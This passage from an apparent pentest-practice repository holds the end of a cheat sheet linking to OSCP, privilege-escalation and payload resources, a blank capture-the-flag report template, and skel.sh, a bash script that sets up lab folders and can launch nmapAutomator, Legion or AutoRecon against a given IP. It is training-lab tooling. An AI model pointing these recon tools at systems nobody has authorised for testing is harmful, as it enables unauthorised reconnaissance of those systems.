2143 | -F (separator string) 2144 | ``` 2145 | 2146 | ### Sublime Text Editor 2147 | 2148 | ```jsx 2149 | Splitting the Selection into Lines 2150 | 2151 | Select a block of lines, and then split it into many selections, one per line, using: 2152 | 2153 | Windows/Linux: Ctrl+Shift+L 2154 | ``` 2155 | 2156 | ### sed cheat sheet 2157 | 2158 | ![https://s3.studylib.net/store/data/008266685_1-65c7d170c2600d5fd58feafc3611414f.png](https://s3.studylib.net/store/data/008266685_1-65c7d170c2600d5fd58feafc3611414f.png) 2159 | 2160 | ## Useful links 2161 | 2162 | [A cheat-sheet for password crackers](https://www.unix-ninja.com/p/A_cheat-sheet_for_password_crackers) 2163 | 2164 | [Penetration testing and webapp cheat sheets](https://doxsec.wordpress.com/2017/07/21/penetration-testing-and-webapp-cheat-sheets/) 2165 | 2166 | [The Ultimate List of SANS Cheat Sheets](https://www.sans.org/blog/the-ultimate-list-of-sans-cheat-sheets/?utm_medium=Social&utm_source=Twitter&utm_content=EMEA&utm_campaign=Security%20Trends%20Blog) 2167 | 2168 | [](https://www.sans.org/security-resources/posters/blueprint-building-pen-tester/160/download) 2169 | 2170 | [](https://www.sans.org/security-resources/posters/pen-test-pivots-payloads/180/download) 2171 | 2172 | [coreb1t/awesome-pentest-cheat-sheets](https://github.com/coreb1t/awesome-pentest-cheat-sheets) 2173 | 2174 | [Penetrating Testing/Assessment Workflow](https://gist.github.com/jivoi/724e4b4b22501b77ef133edc63eba7b4) 2175 | 2176 | [0DAYsecurity.com - The fastest resource to a proactive security](http://www.0daysecurity.com/pentest.html) 2177 | 2178 | [OSCP Ultimate CheatSheet - ByteFellow](https://www.bytefellow.com/oscp-ultimate-cheatsheet/) 2179 | 2180 | [Linux Privilege Escalation CheatSheet for OSCP - ByteFellow](https://www.bytefellow.com/linux-privilege-escalation-cheatsheet-for-oscp/) 2181 | 2182 | [Windows Privilege Escalation Cheatsheet for OSCP - 
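ByteFellow](https://www.bytefellow.com/windows-privilege-escalation-cheatsheet-for-oscp/) 2183 | 2184 | [Cheat Sheet](https://jok3rsecurity.com/cheat-sheet/) 2185 | 2186 | [CountablyInfinite/oscp_cheatsheet](https://github.com/CountablyInfinite/oscp_cheatsheet) 2187 | 2188 | [OSCP: Developing a Methodology](https://falconspy.medium.com/oscp-developing-a-methodology-32f4ab471fd6) 2189 | 2190 | [Passing OSCP](https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html) 2191 | 2192 | [swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) 2193 | 2194 | [](https://storage.googleapis.com/vkmedia-wp-blogg-vk/uploads/uploads/sites/710/2013/08/Linux-101-Hacks.pdf) 2195 | 2196 | -------------------------------------------------------------------------------- /report.md: -------------------------------------------------------------------------------- 1 | * * * 2 | ## *Platform* 3 | 4 | 5 | 6 | * * * 7 | ## *Box Name* 8 | 9 | 10 | 11 | * * * 12 | ## *IP* 13 | 14 | 15 | 16 | * * * 17 | ## *Ports Found* 18 | 19 | 20 | 21 | * * * 22 | ## *Code* 23 | 24 | ```bash 25 | 26 | 27 | ``` 28 | 29 | * * * 30 | ## *Operating System* 31 | 32 | 33 | 34 | * * * 35 | ## *Users* 36 | 37 | 38 | 39 | * * * 40 | ## *Passwords* 41 | 42 | 43 | 44 | 45 | * * * 46 | ## *Credentials* 47 | 48 | 49 | 50 | * * * 51 | ## *Information Disclosure (Software Used)* 52 | 53 | 54 | 55 | * * * 56 | ## *Flags* 57 | 58 | user: 59 | 60 | root: 61 | 62 | 63 | * * * 64 | ## *Notes* 65 | 66 | 67 | 68 | -------------------------------------------------------------------------------- /skel.sh: --------------------------------------------------------------------------------
#!/usr/bin/env bash
#
# skel.sh - scaffold a working directory for a new lab box.
#
# Interactively asks for the platform, the box name and the box IP, then:
#   * creates <LABS_DIR>/<platform>/<boxname> and changes into it
#   * copies the report.md template there as <platform>-<boxname>-<ip>.md
#   * records the IP in ip.txt and opens the report in Sublime Text
#   * pushes platform, box name, IP and a "cd" command to the clipboard (CopyQ)
#   * optionally launches a recon tool (nmapAutomator / legion / autorecon)
#
# Environment (all optional):
#   LABS_DIR     root of the lab tree       (default: $HOME/Documents/labs)
#   SCRIPTS_DIR  directory holding report.md (default: $HOME/Documents/scripts)
#
# The box name becomes a path component and the IP is passed as an argument to
# several external tools (one of them under sudo), so both are restricted to a
# conservative character set before they are used anywhere.

set -euo pipefail

readonly LABS_DIR="${LABS_DIR:-$HOME/Documents/labs}"
readonly SCRIPTS_DIR="${SCRIPTS_DIR:-$HOME/Documents/scripts}"

#######################################
# Print a message to stderr and exit with status 1.
# Arguments: message words
#######################################
die() {
  printf '%s\n' "$*" >&2
  exit 1
}

#######################################
# Print an inverse-video cyan heading line (same look as the original prompts).
# Arguments: $1 - heading text
#######################################
heading() {
  printf '\e[7;96m %s \e[0m\n' "$1"
}

#######################################
# Print one coloured menu entry.
# Arguments: $1 - number, $2 - ANSI colour code (e.g. 92), $3 - label
#######################################
menu_item() {
  printf '%s.\e[1;%sm %s \e[0m\n' "$1" "$2" "$3"
}

#######################################
# Push a string onto the X clipboard so CopyQ records it.
# Best effort: a missing or failing xclip must not abort the scaffolding,
# so a failure only warns. The sleep gives CopyQ time to register the
# previous entry before the next one replaces it.
# Arguments: $1 - text to copy (copied without a trailing newline)
#######################################
to_clipboard() {
  sleep 1
  printf '%s' "$1" | xclip -selection clipboard \
    || printf 'warn: could not copy to clipboard\n' >&2
}

clear
heading 'Which platform are you on?'
menu_item 1 92 Hackthebox
menu_item 2 91 Tryhackme
menu_item 3 94 Vulnhub
IFS= read -r input

# An invalid choice used to leave $platform unset and the script carried on,
# creating directories under "<labs>//<boxname>"; stop instead.
case "$input" in
  1) platform=hackthebox ;;
  2) platform=tryhackme ;;
  3) platform=vulnhub ;;
  *) die 'Please put a valid number!' ;;
esac

echo
heading 'What is the name of the box?'
IFS= read -r boxname
# Letters, digits, dot, dash, underscore, not starting with a dot: rules out
# "", "..", "../x", spaces and option-like values before mkdir/cd/mv see them.
[[ "$boxname" =~ ^[A-Za-z0-9][A-Za-z0-9._-]*$ ]] \
  || die "invalid box name: '$boxname'"

box_dir="$LABS_DIR/$platform/$boxname"
mkdir -p -- "$box_dir"
cd -- "$box_dir" || die "cannot cd to $box_dir"
cp -- "$SCRIPTS_DIR/report.md" .

echo
heading 'what is the box IP?'
IFS= read -r ip
# Handed to firefox, nmapAutomator, autorecon and (under sudo) legion.py as an
# argument: allow IPv4/IPv6/hostname characters only and no leading '-'.
[[ "$ip" =~ ^[A-Za-z0-9][A-Za-z0-9.:-]*$ ]] \
  || die "invalid IP/host: '$ip'"
printf '%s\n' "$ip" > ip.txt

report="$platform-$boxname-$ip.md"
mv -- report.md "$report"
subl "$report"
# CopyQ integration is best effort, like the clipboard pushes below.
copyq show "$boxname" || printf 'warn: copyq show failed\n' >&2
copyq config clipboard_tab "$boxname" || printf 'warn: copyq config failed\n' >&2

# copy variables to clipboard to use with CopyQ
to_clipboard "$platform"
to_clipboard "$boxname"
to_clipboard "$ip"
printf -v cd_cmd 'cd %q' "$box_dir"   # %q keeps the pasted command valid if $HOME has spaces
to_clipboard "$cd_cmd"

echo
heading 'Would you like to start extra scripts & open web browser?'
menu_item 1 95 NmapAutomator
menu_item 2 93 "Legion Framework (Type 'Run' after load)"
menu_item 3 94 AutoRecon
menu_item 9 90 Nothing
IFS= read -r input2

case "$input2" in
  1)
    clear
    firefox "$ip" || printf 'warn: could not open firefox\n' >&2
    nmapAutomator.sh "$ip" All
    ;;
  2)
    clear
    firefox "$ip" || printf 'warn: could not open firefox\n' >&2
    sudo "$HOME/tools/legion/legion.py" --host "$ip" --workdir "$box_dir/legion"
    ;;
  3)
    clear
    autorecon "$ip" -o "$box_dir/autorecon" -vv
    ;;
  *)
    # 9 or anything else: launch nothing, as before
    ;;
esac

echo
heading 'New Folder is ready @:'
pwd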